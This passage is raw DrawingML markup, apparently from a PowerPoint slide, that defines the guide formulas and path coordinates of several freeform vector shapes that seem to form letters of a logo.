                  <a:gd name="T60" fmla="*/ 84 w 494"/>
                  <a:gd name="T61" fmla="*/ 451 h 589"/>
                  <a:gd name="T62" fmla="*/ 47 w 494"/>
                  <a:gd name="T63" fmla="*/ 383 h 589"/>
                  <a:gd name="T64" fmla="*/ 0 w 494"/>
                  <a:gd name="T65" fmla="*/ 247 h 589"/>
                  <a:gd name="T66" fmla="*/ 0 w 494"/>
                  <a:gd name="T67" fmla="*/ 194 h 589"/>
                  <a:gd name="T68" fmla="*/ 5 w 494"/>
                  <a:gd name="T69" fmla="*/ 147 h 589"/>
                  <a:gd name="T70" fmla="*/ 52 w 494"/>
                  <a:gd name="T71" fmla="*/ 73 h 589"/>
                  <a:gd name="T72" fmla="*/ 84 w 494"/>
                  <a:gd name="T73" fmla="*/ 47 h 589"/>
                  <a:gd name="T74" fmla="*/ 126 w 494"/>
                  <a:gd name="T75" fmla="*/ 21 h 589"/>
                  <a:gd name="T76" fmla="*/ 214 w 494"/>
                  <a:gd name="T77" fmla="*/ 0 h 589"/>
                  <a:gd name="T78" fmla="*/ 288 w 494"/>
                  <a:gd name="T79" fmla="*/ 10 h 589"/>
                  <a:gd name="T80" fmla="*/ 320 w 494"/>
                  <a:gd name="T81" fmla="*/ 31 h 589"/>
                  <a:gd name="T82" fmla="*/ 378 w 494"/>
                  <a:gd name="T83" fmla="*/ 89 h 589"/>
                  <a:gd name="T84" fmla="*/ 278 w 494"/>
                  <a:gd name="T85" fmla="*/ 189 h 589"/>
                  <a:gd name="T86" fmla="*/ 257 w 494"/>
                  <a:gd name="T87" fmla="*/ 157 h 5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94" h="589">
                    <a:moveTo>
                      <a:pt x="257" y="157"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="257" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="157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5" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3997325" y="1258888"/>
                <a:ext cx="215900" cy="234950"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 446 w 600"/>
                  <a:gd name="T1" fmla="*/ 515 h 652"/>
                  <a:gd name="T2" fmla="*/ 446 w 600"/>
                  <a:gd name="T3" fmla="*/ 515 h 652"/>
                  <a:gd name="T4" fmla="*/ 436 w 600"/>
                  <a:gd name="T5" fmla="*/ 556 h 652"/>
                  <a:gd name="T6" fmla="*/ 425 w 600"/>
                  <a:gd name="T7" fmla="*/ 572 h 652"/>
                  <a:gd name="T8" fmla="*/ 410 w 600"/>
                  <a:gd name="T9" fmla="*/ 588 h 652"/>
                  <a:gd name="T10" fmla="*/ 410 w 600"/>
                  <a:gd name="T11" fmla="*/ 588 h 652"/>
                  <a:gd name="T12" fmla="*/ 378 w 600"/>
                  <a:gd name="T13" fmla="*/ 614 h 652"/>
                  <a:gd name="T14" fmla="*/ 341 w 600"/>
                  <a:gd name="T15" fmla="*/ 635 h 652"/>
                  <a:gd name="T16" fmla="*/ 341 w 600"/>
                  <a:gd name="T17" fmla="*/ 635 h 652"/>
                  <a:gd name="T18" fmla="*/ 310 w 600"/>
                  <a:gd name="T19" fmla="*/ 645 h 652"/>
                  <a:gd name="T20" fmla="*/ 283 w 600"/>
                  <a:gd name="T21" fmla="*/ 651 h 652"/>
                  <a:gd name="T22" fmla="*/ 252 w 600"/>
                  <a:gd name="T23" fmla="*/ 645 h 652"/>
                  <a:gd name="T24" fmla="*/ 231 w 600"/>
                  <a:gd name="T25" fmla="*/ 641 h 652"/>
                  <a:gd name="T26" fmla="*/ 231 w 600"/>
                  <a:gd name="T27" fmla="*/ 641 h 652"/>
                  <a:gd name="T28" fmla="*/ 205 w 600"/>
                  <a:gd name="T29" fmla="*/ 625 h 652"/>
                  <a:gd name="T30" fmla="*/ 184 w 600"/>
                  <a:gd name="T31" fmla="*/ 604 h 652"/>
                  <a:gd name="T32" fmla="*/ 168 w 600"/>
                  <a:gd name="T33" fmla="*/ 578 h 652"/>
                  <a:gd name="T34" fmla="*/ 152 w 600"/>
                  <a:gd name="T35" fmla="*/ 541 h 652"/>
                  <a:gd name="T36" fmla="*/ 0 w 600"/>
                  <a:gd name="T37" fmla="*/ 157 h 652"/>
                  <a:gd name="T38" fmla="*/ 136 w 600"/>
                  <a:gd name="T39" fmla="*/ 105 h 652"/>
                  <a:gd name="T40" fmla="*/ 273 w 600"/>
                  <a:gd name="T41" fmla="*/ 462 h 652"/>
                  <a:gd name="T42" fmla="*/ 273 w 600"/>
                  <a:gd name="T43" fmla="*/ 462 h 652"/>
                  <a:gd name="T44" fmla="*/ 294 w 600"/>
                  <a:gd name="T45" fmla="*/ 498 h 652"/>
                  <a:gd name="T46" fmla="*/ 310 w 600"/>
                  <a:gd name="T47" fmla="*/ 515 h 652"/>
                  <a:gd name="T48" fmla="*/ 310 w 600"/>
                  <a:gd name="T49" fmla="*/ 515 h 652"/>
                  <a:gd name="T50" fmla="*/ 331 w 600"/>
                  <a:gd name="T51" fmla="*/ 520 h 652"/>
                  <a:gd name="T52" fmla="*/ 362 w 600"/>
                  <a:gd name="T53" fmla="*/ 515 h 652"/>
                  <a:gd name="T54" fmla="*/ 362 w 600"/>
                  <a:gd name="T55" fmla="*/ 515 h 652"/>
                  <a:gd name="T56" fmla="*/ 378 w 600"/>
                  <a:gd name="T57" fmla="*/ 504 h 652"/>
                  <a:gd name="T58" fmla="*/ 389 w 600"/>
                  <a:gd name="T59" fmla="*/ 498 h 652"/>
                  <a:gd name="T60" fmla="*/ 399 w 600"/>
                  <a:gd name="T61" fmla="*/ 483 h 652"/>
                  <a:gd name="T62" fmla="*/ 404 w 600"/>
                  <a:gd name="T63" fmla="*/ 472 h 652"/>
                  <a:gd name="T64" fmla="*/ 410 w 600"/>
                  <a:gd name="T65" fmla="*/ 457 h 652"/>
                  <a:gd name="T66" fmla="*/ 410 w 600"/>
                  <a:gd name="T67" fmla="*/ 441 h 652"/>
                  <a:gd name="T68" fmla="*/ 399 w 600"/>
                  <a:gd name="T69" fmla="*/ 399 h 652"/>
                  <a:gd name="T70" fmla="*/ 263 w 600"/>
                  <a:gd name="T71" fmla="*/ 53 h 652"/>
                  <a:gd name="T72" fmla="*/ 399 w 600"/>
                  <a:gd name="T73" fmla="*/ 0 h 652"/>
                  <a:gd name="T74" fmla="*/ 599 w 600"/>
                  <a:gd name="T75" fmla="*/ 525 h 652"/>
                  <a:gd name="T76" fmla="*/ 473 w 600"/>
                  <a:gd name="T77" fmla="*/ 572 h 652"/>
                  <a:gd name="T78" fmla="*/ 446 w 600"/>
                  <a:gd name="T79" fmla="*/ 515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00" h="652">
                    <a:moveTo>
                      <a:pt x="446" y="515"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="446" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="515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6" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4183063" y="1209675"/>
                <a:ext cx="115887" cy="228600"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 322"/>
                  <a:gd name="T1" fmla="*/ 57 h 635"/>
                  <a:gd name="T2" fmla="*/ 153 w 322"/>
                  <a:gd name="T3" fmla="*/ 131 h 635"/>
                  <a:gd name="T4" fmla="*/ 158 w 322"/>
                  <a:gd name="T5" fmla="*/ 131 h 635"/>
                  <a:gd name="T6" fmla="*/ 158 w 322"/>
                  <a:gd name="T7" fmla="*/ 131 h 635"/>
                  <a:gd name="T8" fmla="*/ 169 w 322"/>
                  <a:gd name="T9" fmla="*/ 89 h 635"/>
                  <a:gd name="T10" fmla="*/ 189 w 322"/>
                  <a:gd name="T11" fmla="*/ 52 h 635"/>
                  <a:gd name="T12" fmla="*/ 189 w 322"/>
                  <a:gd name="T13" fmla="*/ 52 h 635"/>
                  <a:gd name="T14" fmla="*/ 200 w 322"/>
                  <a:gd name="T15" fmla="*/ 36 h 635"/>
                  <a:gd name="T16" fmla="*/ 216 w 322"/>
                  <a:gd name="T17" fmla="*/ 20 h 635"/>
                  <a:gd name="T18" fmla="*/ 232 w 322"/>
                  <a:gd name="T19" fmla="*/ 10 h 635"/>
                  <a:gd name="T20" fmla="*/ 253 w 322"/>
                  <a:gd name="T21" fmla="*/ 5 h 635"/>
                  <a:gd name="T22" fmla="*/ 253 w 322"/>
                  <a:gd name="T23" fmla="*/ 5 h 635"/>
                  <a:gd name="T24" fmla="*/ 263 w 322"/>
                  <a:gd name="T25" fmla="*/ 0 h 635"/>
                  <a:gd name="T26" fmla="*/ 263 w 322"/>
                  <a:gd name="T27" fmla="*/ 0 h 635"/>
                  <a:gd name="T28" fmla="*/ 279 w 322"/>
                  <a:gd name="T29" fmla="*/ 0 h 635"/>
                  <a:gd name="T30" fmla="*/ 321 w 322"/>
                  <a:gd name="T31" fmla="*/ 131 h 635"/>
                  <a:gd name="T32" fmla="*/ 321 w 322"/>
                  <a:gd name="T33" fmla="*/ 131 h 635"/>
                  <a:gd name="T34" fmla="*/ 300 w 322"/>
                  <a:gd name="T35" fmla="*/ 136 h 635"/>
                  <a:gd name="T36" fmla="*/ 300 w 322"/>
                  <a:gd name="T37" fmla="*/ 136 h 635"/>
                  <a:gd name="T38" fmla="*/ 279 w 322"/>
                  <a:gd name="T39" fmla="*/ 141 h 635"/>
                  <a:gd name="T40" fmla="*/ 279 w 322"/>
                  <a:gd name="T41" fmla="*/ 141 h 635"/>
                  <a:gd name="T42" fmla="*/ 242 w 322"/>
                  <a:gd name="T43" fmla="*/ 157 h 635"/>
                  <a:gd name="T44" fmla="*/ 242 w 322"/>
                  <a:gd name="T45" fmla="*/ 157 h 635"/>
                  <a:gd name="T46" fmla="*/ 226 w 322"/>
                  <a:gd name="T47" fmla="*/ 167 h 635"/>
                  <a:gd name="T48" fmla="*/ 216 w 322"/>
                  <a:gd name="T49" fmla="*/ 183 h 635"/>
                  <a:gd name="T50" fmla="*/ 216 w 322"/>
                  <a:gd name="T51" fmla="*/ 183 h 635"/>
                  <a:gd name="T52" fmla="*/ 205 w 322"/>
                  <a:gd name="T53" fmla="*/ 199 h 635"/>
                  <a:gd name="T54" fmla="*/ 200 w 322"/>
                  <a:gd name="T55" fmla="*/ 220 h 635"/>
                  <a:gd name="T56" fmla="*/ 200 w 322"/>
                  <a:gd name="T57" fmla="*/ 220 h 635"/>
                  <a:gd name="T58" fmla="*/ 200 w 322"/>
                  <a:gd name="T59" fmla="*/ 241 h 635"/>
                  <a:gd name="T60" fmla="*/ 205 w 322"/>
                  <a:gd name="T61" fmla="*/ 267 h 635"/>
                  <a:gd name="T62" fmla="*/ 305 w 322"/>
                  <a:gd name="T63" fmla="*/ 587 h 635"/>
                  <a:gd name="T64" fmla="*/ 169 w 322"/>
                  <a:gd name="T65" fmla="*/ 634 h 635"/>
                  <a:gd name="T66" fmla="*/ 0 w 322"/>
                  <a:gd name="T67" fmla="*/ 99 h 635"/>
                  <a:gd name="T68" fmla="*/ 132 w 322"/>
                  <a:gd name="T69" fmla="*/ 57 h 6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22" h="635">
                    <a:moveTo>
                      <a:pt x="132" y="57"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="153" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="57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7" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4287838" y="1128713"/>
                <a:ext cx="120650" cy="274637"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 137 w 337"/>
                  <a:gd name="T1" fmla="*/ 0 h 762"/>
                  <a:gd name="T2" fmla="*/ 169 w 337"/>
                  <a:gd name="T3" fmla="*/ 115 h 762"/>
                  <a:gd name="T4" fmla="*/ 32 w 337"/>
                  <a:gd name="T5" fmla="*/ 152 h 762"/>
                  <a:gd name="T6" fmla="*/ 0 w 337"/>
                  <a:gd name="T7" fmla="*/ 36 h 762"/>
                  <a:gd name="T8" fmla="*/ 137 w 337"/>
                  <a:gd name="T9" fmla="*/ 0 h 762"/>
                  <a:gd name="T10" fmla="*/ 189 w 337"/>
                  <a:gd name="T11" fmla="*/ 183 h 762"/>
                  <a:gd name="T12" fmla="*/ 336 w 337"/>
                  <a:gd name="T13" fmla="*/ 724 h 762"/>
                  <a:gd name="T14" fmla="*/ 195 w 337"/>
                  <a:gd name="T15" fmla="*/ 761 h 762"/>
                  <a:gd name="T16" fmla="*/ 48 w 337"/>
                  <a:gd name="T17" fmla="*/ 220 h 762"/>
                  <a:gd name="T18" fmla="*/ 189 w 337"/>
                  <a:gd name="T19" fmla="*/ 183 h 7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37" h="762">
                    <a:moveTo>
                      <a:pt x="137" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="169" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="189" y="183"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="336" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="183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8" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4383088" y="1114425"/>
                <a:ext cx="149225" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 173 w 415"/>
                  <a:gd name="T1" fmla="*/ 0 h 715"/>
                  <a:gd name="T2" fmla="*/ 210 w 415"/>
                  <a:gd name="T3" fmla="*/ 157 h 715"/>
                  <a:gd name="T4" fmla="*/ 289 w 415"/>
                  <a:gd name="T5" fmla="*/ 136 h 715"/>
                  <a:gd name="T6" fmla="*/ 310 w 415"/>
                  <a:gd name="T7" fmla="*/ 231 h 715"/>
                  <a:gd name="T8" fmla="*/ 231 w 415"/>
                  <a:gd name="T9" fmla="*/ 252 h 715"/>
                  <a:gd name="T10" fmla="*/ 299 w 415"/>
                  <a:gd name="T11" fmla="*/ 546 h 715"/>
                  <a:gd name="T12" fmla="*/ 299 w 415"/>
                  <a:gd name="T13" fmla="*/ 546 h 715"/>
                  <a:gd name="T14" fmla="*/ 310 w 415"/>
                  <a:gd name="T15" fmla="*/ 572 h 715"/>
                  <a:gd name="T16" fmla="*/ 320 w 415"/>
                  <a:gd name="T17" fmla="*/ 588 h 715"/>
                  <a:gd name="T18" fmla="*/ 320 w 415"/>
                  <a:gd name="T19" fmla="*/ 588 h 715"/>
                  <a:gd name="T20" fmla="*/ 336 w 415"/>
                  <a:gd name="T21" fmla="*/ 598 h 715"/>
                  <a:gd name="T22" fmla="*/ 362 w 415"/>
                  <a:gd name="T23" fmla="*/ 593 h 715"/>
                  <a:gd name="T24" fmla="*/ 362 w 415"/>
                  <a:gd name="T25" fmla="*/ 593 h 715"/>
                  <a:gd name="T26" fmla="*/ 378 w 415"/>
                  <a:gd name="T27" fmla="*/ 588 h 715"/>
                  <a:gd name="T28" fmla="*/ 378 w 415"/>
                  <a:gd name="T29" fmla="*/ 588 h 715"/>
                  <a:gd name="T30" fmla="*/ 394 w 415"/>
                  <a:gd name="T31" fmla="*/ 582 h 715"/>
                  <a:gd name="T32" fmla="*/ 414 w 415"/>
                  <a:gd name="T33" fmla="*/ 682 h 715"/>
                  <a:gd name="T34" fmla="*/ 414 w 415"/>
                  <a:gd name="T35" fmla="*/ 682 h 715"/>
                  <a:gd name="T36" fmla="*/ 373 w 415"/>
                  <a:gd name="T37" fmla="*/ 693 h 715"/>
                  <a:gd name="T38" fmla="*/ 373 w 415"/>
                  <a:gd name="T39" fmla="*/ 693 h 715"/>
                  <a:gd name="T40" fmla="*/ 325 w 415"/>
                  <a:gd name="T41" fmla="*/ 703 h 715"/>
                  <a:gd name="T42" fmla="*/ 325 w 415"/>
                  <a:gd name="T43" fmla="*/ 703 h 715"/>
                  <a:gd name="T44" fmla="*/ 289 w 415"/>
                  <a:gd name="T45" fmla="*/ 714 h 715"/>
                  <a:gd name="T46" fmla="*/ 257 w 415"/>
                  <a:gd name="T47" fmla="*/ 714 h 715"/>
                  <a:gd name="T48" fmla="*/ 257 w 415"/>
                  <a:gd name="T49" fmla="*/ 714 h 715"/>
                  <a:gd name="T50" fmla="*/ 231 w 415"/>
                  <a:gd name="T51" fmla="*/ 714 h 715"/>
                  <a:gd name="T52" fmla="*/ 215 w 415"/>
                  <a:gd name="T53" fmla="*/ 703 h 715"/>
                  <a:gd name="T54" fmla="*/ 215 w 415"/>
